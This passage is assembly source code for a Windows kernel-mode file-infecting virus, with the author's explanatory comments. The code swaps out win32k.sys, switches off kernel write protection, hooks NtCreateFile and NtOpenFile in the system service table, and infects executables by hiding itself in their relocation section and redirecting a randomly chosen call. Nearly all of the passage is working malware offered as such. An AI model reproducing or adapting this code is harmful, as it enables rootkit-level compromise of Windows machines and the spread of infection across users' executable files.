GezApi eax,FindCloseCRC,FCNameLen
call eax
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel]            ;renaming win32k.sys to win32k.sy
GezApi eax,MoveFileACRC,MFNameLen
lea esi,[ebp + win32ksy]
push esi
lea esi,[ebp + win32ksys]
push esi
call eax 
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel]		;renaming win32k.fuck to win32k.sys
GezApi eax,MoveFileACRC,MFNameLen
lea esi,[ebp + win32ksys]
push esi
lea esi,[ebp + win32kfuck]
push esi
call eax 					
;;;;;;;;;;;;;;;;;;;;;;;;


;Exit
;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
Exit:				   
mov eax,[ebp + NtKernel]   				;Exit from virus code...
GezApi eax,SetCurrentDirectoryACRC,SCDNameLen
lea esi,[ebp + CurDir]
push esi
call eax 							;we restore current directory.
callz FreeLibrarys					;free librarys loaded.
or ebp,ebp							;first generation exit, ExitProcess.
jnz gen2Exit
push 0
call ExitProcess
gen2Exit:
mov eax,[ebp + EntryPoint]
mov dword ptr [ebp + dirHook],eax
popfd
popad
push 12345678h
dirHook equ $-4
ret
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
SysAlreadyInfected:
lea esi,[ebp + win32kfuck]
push esi
mov eax,[ebp + NtKernel]		;deleting win32k.fuck if it would exist
GezApi eax,DeleteFileACRC,DFNameLen
call eax
jmpz Exit
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Entry Point Of Virus when is executed in ring0.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

EPointSystem:			   ;Ring0 Code
;;;;;;;;;;;;;

push 00000000h                   ;This space in stack will be filled with the entry point
					   ;address of win32k.sys
pushfd
pushad

;;;;;;;;;;;;;;;;;;;;;;;;
callz R0_Doff			   ;i calculate delta offset.
R0_Doff:
pop ebp
sub ebp,offset R0_Doff
;;;;;;;;;;;;;;;;;;;;;;;;



;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + EPointSystem]     ;our target is to search image base of win32k.sys in memory.					
xor ax,ax                        ;hardcoded would be 0A0000000h in my system.		
add eax,1000h
SearchBaseImage:
sub eax,1000h
cmp word ptr [eax],'ZM'
jne SearchBaseImage
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + EntryPointWin32ksys]     ;We have the old entry point and the image base
add ebx,eax                             ;so we have the entry point address. We put 
mov [esp + cPushad + cPushfd],ebx       ;that entry point after pushad and pushfd bytes
;;;;;;;;;;;;;;;;;;;;;;;;		    ;in stack for using ret instruction later and 
						    ;for jumping entry point of win32k.sys


;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[esp + cPushad + cPushfd + 4] ;address in stack of a zone of ntoskrnl(in function
xor ax,ax    				  ;ExCreateCallback).With this address we will get
add  eax,1000h				  ;ntoskrnl base addr
;eax -> a part of ntoskrnl
SearchNtoskrnl:
sub  eax,1000h
cmp  word ptr [eax],'ZM'
jne  SearchNtoskrnl
;eax -> base of ntoskrnl
mov [ebp + Ntoskrnl],eax
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
;now we will get somethings that will be useful for hooking NtCreateFile...SSDT address, 
;syscall number of NtCreateFile, ....
;There is a undocumented entry in the export table of ntoskrnl, KeServiceDescriptorTable, 
;and this entry is the key for accessing the system service dispatch table where we must
;patch for hooking a service(NtCreateFile for example ;)
;KeServiceDescriptorTable points to a structure like this:
;     {
;	  DWORD ServiceTableBase         - pointer to system service dispatch table(SSDT)
;       DWORD ServiceCounterTable      - not important for us
;       DWORD NumberOfServices         - number of services in system service dispatch table
;	  DWORD ParamTableBase           - pointer to system service parameter table(SSPT)
;	}
;
;We want to get the number of the NtCreateFile service and then we search in this table 
;and we patch the address of NtCreateFile rutine with a address of our code

;;;;;;;;;;;;;;;;;;;;;;;;
;eax = ntoskrnl base
GezApi eax,KeServiceDescriptorTableCRC,KSDTNameLen
mov [ebp + KeServiceDescriptorTable],eax
;;;;;;;;;;;;;;;;;;;;;;;;

;ill get SSDT from that service descriptor table

;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[eax]
mov [ebp + SSDT],eax
;;;;;;;;;;;;;;;;;;;;;;;;

;now ill get from ntoskrnl the addr of NtCreateFile

;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezApi eax,NtCreateFileCRC,NCFNameLen
mov [ebp + NtCreateFileAddr],eax
;;;;;;;;;;;;;;;;;;;;;;;;

;Ill get service ID from ZwCreateFile

;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezSyscall eax,ZwCreateFileCRC,ZCFNameLen
;;;;;;;;;;;;;;;;;;;;;;;;

;now ill search in the SSDT the address of the entry of NtCreateFile where we will hook

;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + SSDT]
;ebx + eax*4 -> entry
shl eax,2
add ebx,eax
;ebx -> entry
mov [ebp + NtCreateFileEntryAddr],ebx
;;;;;;;;;;;;;;;;;;;;;;;;


;and with NtOpenFile same thing

;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezApi eax,NtOpenFileCRC,NOFNameLen
mov [ebp + NtOpenFileAddr],eax
;;;;;;;;;;;;;;;;;;;;;;;;


;Ill get service ID from ZwOpenFile

;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezSyscall eax,ZwOpenFileCRC,ZOFNameLen
;;;;;;;;;;;;;;;;;;;;;;;;



;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + SSDT]
;ebx + eax*4 -> entry
shl eax,2
add ebx,eax
;ebx -> entry
mov [ebp + NtOpenFileEntryAddr],ebx
;;;;;;;;;;;;;;;;;;;;;;;;

;We hook NtCreateFile and NtOpenFile



;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,cr0						;we set write protect flag to 1, and in this 
push eax						;supervision of writing readonly mem is disabled
or eax,00010000h					;We do this for writing SSDT coz is possible (under
mov cr0,eax				        	;XP is default) SSDT is read only.
							;(Thx Ratter ;)
;;;;;;;;;;;;;;;;;;;;;;;;
							
							


;;;
;Note in the next inst we get the service ID of NtCreateFile and NtOpenFile from Zws funcions
;of them. I got it searching NtCreateFile and NtOpenFile in ntoskrnl and scanning SSDT 
;comparing with entrys and when is the same value that is the entry.Ratter said me the problem 
;of this: NtOpenFile or NtCreateFile could be previosly hooked and with this method this 
;will not work( Thx again Ratter :)

;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + NtCreateFileEntryAddr]
lea eax,[ebp + NtCreateFileHookRutine]
mov [ebx],eax   					;in this moment we HOOK NtCreateFile
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + NtOpenFileEntryAddr]
lea eax,[ebp + NtOpenFileHookRutine]
mov [ebx],eax   					;in this moment we HOOK NtOpenFile
;;;;;;;;;;;;;;;;;;;;;;;;



;;;;;;;;;;;;;;;;;;;;;;;;
pop eax						;we restore WP flag to original value
mov cr0,eax			      
;;;;;;;;;;;;;;;;;;;;;;;;



;;;;;;;;;;;;;;;;;;;;;;;;
callz GetApisRing0                        ;ill get some apis for no calling all time GezApi
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
callz DeleteWin32ksy				;i must delete win32k.sy if still not deleted
;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
callz PayloadRing0
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
ReturnWin32ksys:
popad
popfd
ret            	;previosly i moved entry point adress of win32k.sys at position in stack
			;so this ret will fill eip with start point of win32k.sys
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

NtOpenFileHookRutine:
;;;;;;;;;;;;;;;;;;;;;

pushfd
pushad

;;;;;;;;;;;;;;;;;;;;;;;;
callz doff_hookOF			;delta offset
doff_hookOF:
pop ebp
sub ebp,offset doff_hookOF
;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtOpenFileAddr]
mov [ebp + HookRealAddr],eax   ;we put the jump to real code of NtOpenFile
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
jmpz GeneralCodeForInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;


;NTSTATUS NtOpenFile(
;			     OUT PHANDLE FileHandle,                   
;       		     IN ACCESS_MASK DesiredAccess,             
;			     IN POBJECT_ATTRIBUTES ObjectAttributes,   
;			     OUT PIO_STATUS_BLOCK IoStatusBlock,
;			     IN ULONG ShareAccess,
;			     IN ULONG OpenOptions
;			  );


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
NtCreateFileHookRutine:

pushfd
pushad

;;;;;;;;;;;;;;;;;;;;;;;;
callz doff_hookCF			;delta offset
doff_hookCF:
pop ebp
sub ebp,offset doff_hookCF
;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtCreateFileAddr]
mov [ebp + HookRealAddr],eax   ;we put the jump to real code of NtCreateFile
;;;;;;;;;;;;;;;;;;;;;;;;


;NTSTATUS NtCreateFile(
;			     OUT PHANDLE FileHandle,                   
;       		     IN ACCESS_MASK DesiredAccess,             
;			     IN POBJECT_ATTRIBUTES ObjectAttributes,   
;			     OUT PIO_STATUS_BLOCK IoStatusBlock,        
;			     IN PLARGE_INTEGER AllocationSize OPTIONAL, 
;			     IN ULONG FileAttributes,			     
;			     IN ULONG ShareAccess,			     
;			     IN ULONG CreateDisposition,		     
;			     IN ULONG CreateOptions,
;			     IN ULONG EaBuffer OPTIONAL,
;			     IN ULONG EaLength
;      		     );	
;

;this only for NtCreateFile:

;;;;;;;;;;;;;;;;;;;;;;;;
;i get some datas from parameters
mov eax,[esp + cPushad + cPushfd + 4 + 14h]
mov [ebp + AttributesFileRing0],eax   	   ;i get the attributes of file
mov eax,[esp + cPushad + cPushfd + 4 + 1ch]
mov [ebp + CreateDispositionFileRing0],eax   ;i get manner for opening the file
mov eax,[esp + cPushad + cPushfd + 4 + 20h]
mov [ebp + CreateOptionsFileRing0],eax   	   ;i get some more flags relative 
;;;;;;;;;;;;;;;;;;;;;;;;			   ;to manner of opening the file


;;;;;;;;;;;;;;;;;;;;;;;;		
;I want a existing file non directory
test dword ptr [ebp + CreateDispositionFileRing0],FILE_OPEN
jz StopInfectionRing0
;test dword ptr [ebp + CreateOptionsFileRing0],FILE_NON_DIRECTORY_FILE
;jz StopInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
;jmpz GeneralCodeForInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;




;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

GeneralCodeForInfectionRing0:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
callz UnhookWhile				;ill unhook apis while hooking rutine coz for example
;;;;;;;;;;;;;;;;;;;;;;;;		;if we call ZwOpenFile we will go to a infinite loop



;OBJECT_ATTRIBUTES {
;			     ULONG Length;
;			     PUNICODE_STRING ObjectName;
;			     HANDLE RootDirectory;
;			     PSECURITY_DESCRIPTOR SecurityDescriptor;
;			     PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
;			     ULONG Attributes;
;			 }
;
;UNICODE_STRING    {
;			     USHORT Length;     ;len in bytes of Buffer
;			     USHORT MaximumLength;
;			     PWSTR Buffer;
;		       } 
;note if RootDirectory parameter is null,ObjectName has a fully qualified file specification,
;path+name,but if RootDirectory is non null,then ObjectName has only the name of the object
;relative to RootDirectory directory.
;when we call NtOpenFile we must use both RootDirectory and ObjectName.


;;;;;;;;;;;;;;;;;;;;;;;;
;Ill get the file name of the file i want to infect
mov edi,[esp + cPushad + cPushfd + 4 + 8]    ;edi -> ObjectAttributes 
mov eax,[edi + 4] 			         ;eax = RootDirectory
mov [ebp + RootDirectoryRing0],eax
mov esi,[edi + 8]				         ;esi -> unicode string of the name
mov eax,[esi]
mov dword ptr [ebp + FileNameRing0],eax
lea edi,[ebp + StringRing0]		         ;edi -> our buffer for unicode string of name
mov dword ptr [ebp + FileNameRing0 + 4],edi     
movzx ecx,word ptr [esi]  		         ;ecx =  long of unicode string
mov esi,[esi + 4]
rep movsb			  		         ;i copy the buffer
;;;;;;;;;;;;;;;;;;;;;;;;



;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv |quitar esto| vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
movzx ecx,word ptr [ebp + FileNameRing0]
mov eax,dword ptr [ebp + FileNameRing0 + 4]
add eax,ecx
dec eax
dec eax
cmp byte ptr [eax],'e'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'x'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'e'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'.'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'z'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'z'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'z'
jne StopInfectionRing0
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ |quitar esto| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^



;;;;;;;;;;;;;;;;;;;;;;;;
movzx ecx,word ptr [ebp + FileNameRing0]           ;I test if file is a .exe file
mov eax,dword ptr [ebp + FileNameRing0 + 4]        
add eax,ecx
dec eax
dec eax
or  byte ptr [eax],20h
cmp byte ptr [eax],'e'					   
jne StopInfectionRing0					   
dec eax							   
dec eax							   
or  byte ptr [eax],20h					   
cmp byte ptr [eax],'x'					   
jne StopInfectionRing0					   
dec eax							   
dec eax							   
or  byte ptr [eax],20h					   
cmp byte ptr [eax],'e'					   
jne StopInfectionRing0					   
dec eax							   
dec eax
cmp byte ptr [eax],'.'
jne StopInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
callz MapFileRing0			      ;map the file for infection ;)
or eax,eax
jz StopInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,eax
;ebx = Base of Mapped File	  
cmp word ptr [ebx],'ZM'		  
jne CloseAndStopInfectionRing0  
mov edi,[ebx + 3ch]		  
add edi,ebx				  
;edi -> PE				  
cmp word ptr [edi],'EP'		  
jne CloseAndStopInfectionRing0  
cmp word ptr [edi + 8],'zs'	  
je  CloseAndStopInfectionRing0  ;is it already infected?
mov ax,word ptr [edi + 16h]
test ax,00000002h			          ;yes IMAGE_FILE_EXECUTABLE_IMAGE
je CloseAndStopInfectionRing0
test ax,00001000h     		          ;no IMAGE_FILE_SYSTEM
jne CloseAndStopInfectionRing0 
test ax,00002000h		     	          ;no IMAGE_FILE_DLL
jne CloseAndStopInfectionRing0
mov ax,[edi + 5ch]
test ax,00000001h         	  	    ;no IMAGE_SUBSYSTEM_NATIVE 
jne CloseAndStopInfectionRing0

;ebx->MZ
;edi->PE
;;;;;;;;;;;;;;;;;;;;;;;;
;we will search EPoint of file
mov edx,[edi + 28h]	        
;edx = RVA epoint,we need the pointer to raw data
movzx ecx,word ptr [edi + 6]
mov eax,edi
add eax,0F8h-28h ;sections
inc ecx
GoToSectionEPointInfectionRing0:
dec ecx
or ecx,ecx
jz CloseAndStopInfectionRing0
add eax,28h
cmp dword ptr [eax.IMAGE_SECTION_HEADER.SH_VirtualAddress],edx
jnle GoToSectionEPointInfectionRing0
mov esi,dword ptr [eax.IMAGE_SECTION_HEADER.SH_VirtualAddress]
add esi,dword ptr [eax.IMAGE_SECTION_HEADER.SH_SizeOfRawData]
cmp edx,esi
jnl GoToSectionEPointInfectionRing0
;eax->.text section header
mov dword ptr [ebp + textSecHeader],eax
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
;now we will search relocs section
mov edx,[edi.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_DirectoryEntries.DE_BaseReloc.DD_VirtualAddress]
movzx ecx,word ptr [edi + 6]
mov eax,edi
add eax,0F8h-28h ;sections
inc ecx
GoToSectionRelocInfectionRing0:
dec ecx
or ecx,ecx
jz CloseAndStopInfectionRing0
add eax,28h
cmp dword ptr [eax.IMAGE_SECTION_HEADER.SH_VirtualAddress],edx
jnle GoToSectionRelocInfectionRing0
mov esi,dword ptr [eax.IMAGE_SECTION_HEADER.SH_VirtualAddress]
add esi,dword ptr [eax.IMAGE_SECTION_HEADER.SH_SizeOfRawData]
cmp edx,esi
jnl GoToSectionRelocInfectionRing0
;eax->.reloc section header
mov dword ptr [ebp + relocSecHeader],eax
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
;ebx->MZ
;edi->PE
mov [ebp + HostMZ],ebx
mov [ebp + HostPE],edi
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
;Getting a offset for the virus
mov eax,[eax.IMAGE_SECTION_HEADER.SH_SizeOfRawData]
push eax
call randRing0
;eax = rand value 0...(size of reloc section)/2
pop edx
sub edx,eax ;edx = size for vx
cmp edx,tamvirus
jb  CloseAndStopInfectionRing0
mov edx,[ebp + relocSecHeader]
mov edx,[edx.IMAGE_SECTION_HEADER.SH_PointerToRawData]
add edx,eax
mov [ebp + OffsetVirus],edx ;we will put the virus in reloc section + rand value
;;;;;;;;;;;;;;;;;;;;;;;;



;;;;;;;;;;;;;;;;;;;;;;;;
;Getting RVA virus
mov ebx,[ebp + relocSecHeader]
mov edx,[ebx.IMAGE_SECTION_HEADER.SH_PointerToRawData]
mov eax,[ebx.IMAGE_SECTION_HEADER.SH_VirtualAddress]
sub eax,edx
mov edx,[ebp + OffsetVirus]
add edx,eax
mov [ebp + RVAVirus],edx
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
;Erasing RVA and size in data directory for relocs
mov edi,[ebp + HostPE]
mov dword ptr [edi.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_DirectoryEntries.DE_BaseReloc.DD_VirtualAddress],00000000h
mov dword ptr [edi.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_DirectoryEntries.DE_BaseReloc.DD_Size],00000000h
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + textSecHeader]
mov edx,[eax.IMAGE_SECTION_HEADER.SH_PointerToRawData]
push edx
mov eax,[eax.IMAGE_SECTION_HEADER.SH_SizeOfRawData]
add edx,eax
add edx,dword ptr [ebp + HostMZ]
mov [ebp + TextSecEnd],edx 
call randRing0 
pop edx
;edx = PointerToRawData Text Section
;eax = rand value 0...SizeOfRawData/2
add edx,eax
add edx,dword ptr [ebp + HostMZ]
;;;;;;;;;;;;;;;;;;;;;;;;


;Super's Theory:
;
;	When u jump a random number of bytes in a buffer of code its possible u will
;	jump to a zone between instruction. For example: E8 11 22 33 44 its possible 
;	in a random jump you will stay pointing 11 or 22 instead instruction opcode E8.
;	but its possible redrive ur pointer to opcodes doing a route over the code
;	getting instruction lengths and adding them to your pointer, 16 times at max.
;	Then u will be in opcodes sure.

;edx = pointer

;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + tbl]
push eax
call disasm_init
pop eax;clean stack

RedrivePointer:

inc edx
mov eax,dword ptr [ebp + TextSecEnd]
sub eax,50
cmp eax,edx
jl CloseAndStopInfectionRing0
mov ecx,16

goodInsContinue:
push edx
lea eax,[ebp + tbl]
push eax
call disasm_main
pop esi
pop esi
add edx,eax
or eax,eax
jz RedrivePointer
mov eax,dword ptr [ebp + TextSecEnd]
sub eax,50
cmp eax,edx
jl CloseAndStopInfectionRing0
loop goodInsContinue
;;;;;;;;;;;;;;;;;;;;;;;;


;well,if all was as we want,we are pointing to a good opcode

;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,edx
call SearchCall
or eax,eax
jz CloseAndStopInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
;ebx -> E8 XX XX XX XX
;the VA of the call is ebx + 5 + (XX XX XX XX)

mov edx,[ebp + textSecHeader]
mov eax,[edx.IMAGE_SECTION_HEADER.SH_VirtualAddress]
sub eax,[edx.IMAGE_SECTION_HEADER.SH_PointerToRawData]
add eax,ebx
sub eax,[ebp + HostMZ]
;eax RVA of E8 XX XX XX XX
push eax
add eax,[ebx + 1]
add eax,5

;eax = RVA of call pointing addr
;we will put in EntryPoint variable the VA of the call. When ring3 part of virus returned
;to host it will jmp to the content of this variable.

mov edi,[ebp + HostPE]
add eax,[edi.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_ImageBase]
;eax=VA of call pointing addr
mov [ebp + EntryPoint],eax

pop eax
;eax RVA of E8 XX XX XX XX
mov edx,[ebp + RVAVirus]
add eax,5
sub edx,eax
;we patch the call for pointing our code
mov [ebx+1],edx
;if all well,the call is calling the virus,and the virus will pass the control where the
;call was calling before patching...EPO
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
;the virus will be writed in the host,at offset = OffsetVirus
;we must search a call for patching with a call to virus
mov edx,[ebp + HostMZ] ;MZ
mov ebx,[ebp + HostPE] ;PE
mov edi,edx
add edi,[ebp + OffsetVirus]
lea esi,[ebp + svirus]
mov ecx,tamvirus
rep movsb
mov word ptr [ebx + 8],'zs'
;;;;;;;;;;;;;;;;;;;;;;;;



;;;;;;;;;;;;;;;;;;;;;;;;
CloseAndStopInfectionRing0:		    ;close and bye
callz CloseAllRing0
;;;;;;;;;;;;;;;;;;;;;;;;



;;;;;;;;;;;;;;;;;;;;;;;;
StopInfectionRing0:
callz RehookAgain
popad
popfd
push 12345678h
HookRealAddr = dword ptr  $ - 4
ret
;;;;;;;;;;;;;;;;;;;;;;;;


textSecHeader  dd 0
relocSecHeader dd 0
relocRVA	   dd 0
OffsetVirus    dd 0
HostMZ	   dd 0
HostPE	   dd 0
RVAVirus	   dd 0
TextSecEnd     dd 0

;;;;;;;;;;;;;;;;;;;;;;;;
;randRing0: this funcion will generate a ramdom number gived a size
;parameters:
; eax = size The number will be generated 0...size
randRing0:
push eax
mov eax,[ebp + Ntoskrnl]
GezApi eax,KeQueryTickCountCRC,KQTCNameLen
lea ebx,[ebp + randvalue]
push ebx
call eax
mov edx,[ebp + randvalue]
pop eax 
;eax = size
;edx = TickCount
and edx,000000FFh
mov ecx,edx
shl ecx,8
or  edx,ecx
mov ecx,edx
shl ecx,16
or  edx,ecx
and edx,eax
cmp edx,eax
jg  randRing0
mov eax,edx
shr eax,1
ret
randvalue dd 0
;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
;randRing3: this funcion will generate a ramdom number gived a size
;parameters:
; eax = size The number will be generated 0...size
randRing3:
push eax
mov eax,[ebp + NtKernel]
GezApi eax,GetTickCountCRC,GTCNameLen
call eax
mov edx,eax
pop eax 
;eax = size
;edx = TickCount
and edx,000000FFh
mov ecx,edx
shl ecx,8
or  edx,ecx
mov ecx,edx
shl ecx,16
or  edx,ecx
and edx,eax
cmp edx,eax
jg  randRing3
mov eax,edx
shr eax,1
ret
;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
					;;;;;;;;FUNCTIONS;;;;;;;;;;;;;
					;;;;;;;;FUNCTIONS;;;;;;;;;;;;;
					;;;;;;;;FUNCTIONS;;;;;;;;;;;;;
					;;;;;;;;FUNCTIONS;;;;;;;;;;;;;
					;;;;;;;;FUNCTIONS;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;SECOND VERSION IMPROVEMENT: we will add zombie length disassembler engine for getting
;a good EPO infection :D (thx z0mbie...we didnt say u if we could to use your lde but 
;we thought this is a good purpose so you would be agree ;)

include lde32bin.inc ; LDE32 code 

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;SearchCall: this function will search a call instruction given a buffer with code.
;in:ebx->buffer with code
;
;The function will return eax = 0 if error
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
SearchCall:

lea esi,[ebp + tbl]
push esi
call disasm_init
pop esi;clean stack
xor eax,eax

LoopSearchCall:
inc eax
or eax,eax
jz FoundCall
cmp byte ptr [ebx],0E8h
je FoundCall
push ebx
lea esi,[ebp + tbl]
push esi
call disasm_main
pop esi
pop esi
add ebx,eax
jmp LoopSearchCall
FoundCall:
ret

tbl db 2048 dup (?)

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;CRC32 rutine(from Billy Belcebu tutorial)...i have not said him nothing about i have take
;his rutine but i dont know him...in addition i have seen this rutine in other viruses
;so i think he doesnt go angry if i use it :)
;
;in:esi -> start of buffer
;   edi = size of buffer
;out:
;   eax = cksum 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
CRC32:

	cld
      xor     ecx,ecx
      dec     ecx
	mov     edx,ecx
NextByteCRC:
	xor     eax,eax
	xor     ebx,ebx
	lodsb
      xor     al,cl                           
      mov     cl,ch                           
	mov     ch,dl
	mov     dl,dh
	mov     dh,8
NextBitCRC:
	shr     bx,1
	rcr     ax,1
	jnc     NoCRC
	xor     ax,08320h
	xor     bx,0EDB8h
NoCRC:
      dec     dh
	jnz     NextBitCRC
	xor     ecx,eax
	xor     edx,ebx
      dec     edi
	jnz     NextByteCRC
	not     edx
	not     ecx
	mov     eax,edx
	rol     eax,16
	mov     ax,cx
	ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;




;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;GetApi gets a api address from its crc. 
;in:
;   eax -> base of dll
;   edx = the crc32 of api to search.
;   ebx = api name len.
;out:
;   eax -> function
